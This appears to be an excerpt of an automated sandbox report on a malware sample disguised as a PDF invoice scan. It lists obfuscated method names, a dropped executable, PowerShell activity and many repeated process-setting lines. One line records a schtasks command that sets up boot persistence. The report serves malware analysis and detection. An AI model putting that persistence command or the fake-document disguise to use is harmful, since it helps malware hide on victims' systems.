                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, PTvxxmJotxLVN9STyr.csHigh entropy of concatenated method names: 'AJXxGQo1VE', 'nwfxt8wa3k', 'hjGxl5Z2km', 'huex9a7yhN', 'RRKx8IBcbi', 'NIXxj1pO3P', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, ux9vSlGKqPeRjOAVLu.csHigh entropy of concatenated method names: 'GIeEUfTglX', 'MbuEwEmHMr', 'Q7WEeaJhNX', 'mCMECSPajP', 'z5SERvXeyf', 'HPNePIJ9n8', 'CnXeV1XuFN', 's5yeXqatLQ', 'BPOeIBRi0E', 'ADveJOvVW7'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, l0rTNDqyDaNsKGgWCtZ.csHigh entropy of concatenated method names: 'XjgFvhYvZ8', 'trIFLWHgDA', 'G5aFAsD7uD', 'TFVFicf4ki', 'xbeFoZ8cQf', 'GQDF0l2Cfj', 'IuvFm60byb', 'kt6FQMf7ZQ', 'TcQF1rMdSM', 'yLgFp3gdpY'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, OcYj6lwsu9665C7RdN.csHigh entropy of concatenated method names: 'Dispose', 'utqqJqXZKy', 'nLGfti9LC0', 'rwxAAqilNt', 'a81qO4uEPZ', 'f2pqzWTOX8', 'ProcessDialogKey', 'WEhfyTvxxm', 'BtxfqLVN9S', 'uyrffO6jpp'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, beyHOCpHso4XwCAhW9.csHigh entropy of concatenated method names: 'kSoeonxfvJ', 'fS7emnTJKH', 'sZk4lldOeZ', 'k6549X86vM', 'j9j4jV1576', 'fBR4KYhm8Z', 'pv847YPTat', 'bPS4r7rUdN', 'tLC4nRCt4I', 'TCx4Z2KOTT'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, TZMrSA5bjF9p5nJuyn.csHigh entropy of concatenated method names: 'CAZqC4HVLf', 'IWEqRtmNwY', 'iguq3rdFYd', 'N8Eq6UqeyH', 'jAhqkW9Tx9', 'xSlqcKqPeR', 'lpgO2aN2q0cKvS865v', 'O67kPTA5rUHnVUQWb2', 'K5NqqsCeAN', 'uEsqMxCOmY'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, l3jrCG705X6hFIo3hF.csHigh entropy of concatenated method names: 'IFJCBJTUAx', 'Od3C4pm37W', 'WxOCEBX913', 'T8SEOrFEdZ', 'lPNEzp6weZ', 'tqjCytTKls', 'lV9CqGDwN8', 'rg1CfVJvYV', 'E0kCMqHcGw', 'e5LC50dHlv'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.csHigh entropy of concatenated method names: 'MwbMU6oMTV', 'LhdMBfOSIY', 's59MwpBZPo', 'qZyM4PNQZ1', 'kNgMewummS', 'TAjME3oBAR', 'FxAMCnwo25', 'qDnMR0mMjX', 'JjhM2Enxy6', 'lI0M3CVgj7'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, N4HVLfQlWEtmNwYgDD.csHigh entropy of concatenated method names: 'caJw8qpg4T', 'lcpwsc7S67', 'aolwNLcUXm', 'GItwSa5kp7', 'whswPCY0XH', 'HNCwVgKREm', 'ih4wXWOdmC', 'RSYwIMn15b', 'LAiwJ2KaVY', 'XRIwO2sffO'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, LijqxanU7dEpkg6cli.csHigh entropy of concatenated method names: 'ssVCvpAh2R', 'sVaCLKyxWT', 'cmKCAAenyY', 'BotCi2YNRm', 'Nx4Coi2MCw', 'thbC0obhQL', 'ndNCmRYRfA', 'TZKCQGAUJJ', 'bgVC1xmXyp', 'O6wCpE5EJA'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, PUXfyYhOisseua71nE.csHigh entropy of concatenated method names: 'olTHQSFvXX', 'bLmH1ImYYt', 'RdQHGnljTk', 'zdAHt18exZ', 'eJqH9KaLdo', 'jvpHj0hS1P', 'uTJH7AIdhc', 'CPaHrJVHCP', 'TRgHZuUu75', 'punHYThhMC'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, d3UPZwfTJirq8rKYh5.csHigh entropy of concatenated method names: 'DHfAkkD6G', 'Mwgik0kDC', 'ydX0hyoCS', 'y9HmFdx0G', 'H3Q16hBaC', 'VmgplW6dM', 'BtZjxLuTDX22NxgqPa', 'okCIdeLk4OdPOnJkRl', 'uAsxVMfoV', 'TsadR9nn0'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, Y6jppOOik1jxEfnyeW.csHigh entropy of concatenated method names: 'cVTFqvP20K', 'EdHFMc5s47', 'lcsF5B2irN', 'LDUFBW4tj2', 'DTUFwoFrYW', 'lFXFeNaLnH', 'JqZFEOgUE7', 'lqdxXil0d9', 'vsgxISXe4N', 'DrrxJBYXIP'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, Q14uEPIZB2pWTOX8IE.csHigh entropy of concatenated method names: 'SE4xBiD6vW', 'UrTxwymvCm', 'urkx4hv5p8', 'hIAxeNAmf4', 'Lx9xEfDnFi', 'zVvxCwxytf', 'qL6xRTSYuy', 'k1vx2nbumv', 'zyJx3eWMka', 'JLWx6fpjZy'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, dhCiOE1gurdFYdZ8EU.csHigh entropy of concatenated method names: 'ONM4iyKTOY', 'FyT4067Eax', 'BLB4Q87qWj', 'I8V41OevHe', 'iW04kLdhFl', 'iJ94cquvl2', 'fY04uZFnnY', 'KG04x4bNM9', 'lBD4FYXvfJ', 'JYm4dxgmjR'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, dlgOETSLkDKjaBXuna.csHigh entropy of concatenated method names: 'QLSu3ljN2I', 'meKu6HEtDf', 'ToString', 'jaFuBSVVxn', 'bLEuwpldvP', 'TSSu4f9a1d', 'hXKuevi8yM', 'fjMuEXnjfQ', 'LqMuCbFchM', 'TkLuRyZlWm'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, EcUZlHV5xRcLAB93AA.csHigh entropy of concatenated method names: 'tQ9uICfKRk', 'FjFuOVjqwK', 'zkCxyKoEU4', 'MgOxqHumOa', 'GEsuYPUNXP', 'Dx3ub6PnZr', 'xbWuhNJ5S0', 'itGu8Ovk2j', 'X6susbaTr4', 'jptuNn6Vf0'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, b782kv8OjIfOJ04YOb.csHigh entropy of concatenated method names: 'eyWkZkV0vw', 's1Zkbf84Lu', 'qQ5k85iLHH', 'Vc4ksgqmH0', 'qHpktShYdc', 'S2Uklbs0Tr', 'ujGk9a1cRs', 'AgVkj99yXV', 'KMEkKGPoCy', 'jKvk7862SO'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, haAMWuqMIRY1u5L88Ga.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kGSd81TFoA', 'SuIdsSy5WE', 'jZHdNxdfmv', 'vBndSix9qq', 'yAndPw2OXY', 'G9TdVQTvGF', 'Ps2dXW5oZD'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, PTvxxmJotxLVN9STyr.csHigh entropy of concatenated method names: 'AJXxGQo1VE', 'nwfxt8wa3k', 'hjGxl5Z2km', 'huex9a7yhN', 'RRKx8IBcbi', 'NIXxj1pO3P', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, ux9vSlGKqPeRjOAVLu.csHigh entropy of concatenated method names: 'GIeEUfTglX', 'MbuEwEmHMr', 'Q7WEeaJhNX', 'mCMECSPajP', 'z5SERvXeyf', 'HPNePIJ9n8', 'CnXeV1XuFN', 's5yeXqatLQ', 'BPOeIBRi0E', 'ADveJOvVW7'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, l0rTNDqyDaNsKGgWCtZ.csHigh entropy of concatenated method names: 'XjgFvhYvZ8', 'trIFLWHgDA', 'G5aFAsD7uD', 'TFVFicf4ki', 'xbeFoZ8cQf', 'GQDF0l2Cfj', 'IuvFm60byb', 'kt6FQMf7ZQ', 'TcQF1rMdSM', 'yLgFp3gdpY'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, OcYj6lwsu9665C7RdN.csHigh entropy of concatenated method names: 'Dispose', 'utqqJqXZKy', 'nLGfti9LC0', 'rwxAAqilNt', 'a81qO4uEPZ', 'f2pqzWTOX8', 'ProcessDialogKey', 'WEhfyTvxxm', 'BtxfqLVN9S', 'uyrffO6jpp'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, beyHOCpHso4XwCAhW9.csHigh entropy of concatenated method names: 'kSoeonxfvJ', 'fS7emnTJKH', 'sZk4lldOeZ', 'k6549X86vM', 'j9j4jV1576', 'fBR4KYhm8Z', 'pv847YPTat', 'bPS4r7rUdN', 'tLC4nRCt4I', 'TCx4Z2KOTT'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, TZMrSA5bjF9p5nJuyn.csHigh entropy of concatenated method names: 'CAZqC4HVLf', 'IWEqRtmNwY', 'iguq3rdFYd', 'N8Eq6UqeyH', 'jAhqkW9Tx9', 'xSlqcKqPeR', 'lpgO2aN2q0cKvS865v', 'O67kPTA5rUHnVUQWb2', 'K5NqqsCeAN', 'uEsqMxCOmY'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, l3jrCG705X6hFIo3hF.csHigh entropy of concatenated method names: 'IFJCBJTUAx', 'Od3C4pm37W', 'WxOCEBX913', 'T8SEOrFEdZ', 'lPNEzp6weZ', 'tqjCytTKls', 'lV9CqGDwN8', 'rg1CfVJvYV', 'E0kCMqHcGw', 'e5LC50dHlv'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.csHigh entropy of concatenated method names: 'MwbMU6oMTV', 'LhdMBfOSIY', 's59MwpBZPo', 'qZyM4PNQZ1', 'kNgMewummS', 'TAjME3oBAR', 'FxAMCnwo25', 'qDnMR0mMjX', 'JjhM2Enxy6', 'lI0M3CVgj7'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, N4HVLfQlWEtmNwYgDD.csHigh entropy of concatenated method names: 'caJw8qpg4T', 'lcpwsc7S67', 'aolwNLcUXm', 'GItwSa5kp7', 'whswPCY0XH', 'HNCwVgKREm', 'ih4wXWOdmC', 'RSYwIMn15b', 'LAiwJ2KaVY', 'XRIwO2sffO'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, LijqxanU7dEpkg6cli.csHigh entropy of concatenated method names: 'ssVCvpAh2R', 'sVaCLKyxWT', 'cmKCAAenyY', 'BotCi2YNRm', 'Nx4Coi2MCw', 'thbC0obhQL', 'ndNCmRYRfA', 'TZKCQGAUJJ', 'bgVC1xmXyp', 'O6wCpE5EJA'
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile created: C:\Users\user\AppData\Roaming\QeSBxb.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
